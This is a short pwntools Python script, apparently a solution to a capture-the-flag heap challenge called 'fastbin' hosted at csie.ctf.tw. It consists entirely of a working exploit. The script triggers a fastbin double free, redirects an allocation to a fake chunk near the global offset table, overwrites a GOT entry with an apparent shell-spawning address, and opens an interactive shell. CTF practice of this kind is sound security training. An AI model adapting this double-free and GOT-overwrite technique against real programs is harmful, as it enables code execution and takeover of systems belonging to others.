from pwn import *
#r = remote("0",8888)
r = remote("csie.ctf.tw",10150)
elf = ELF('./fastbin')

puts_got = elf.got['puts']
raw_input()

r.sendline("1 0")
r.sendline("56")
r.sendline("A")
r.sendline("1 1")
r.sendline("56")
r.sendline("A")
r.recv(1024)
r.sendline("2 0")
r.sendline("2 1")
r.sendline("2 0")
r.sendline("1 0")
r.sendline("56")
r.sendline(p64(0x601042))
#r.sendline(p64(0x601022))
r.recv(1024)

r.sendline("1 1")
r.sendline("56")
r.sendline("A")
r.sendline("1 1")
r.sendline("56")
r.sendline("A")
r.sendline("1 1")
r.sendline("56")
r.sendline("sh\x00"*2+p64(0x0000000000400826))
r.sendline("1 5\n"+str(0x601052))
r.interactive()
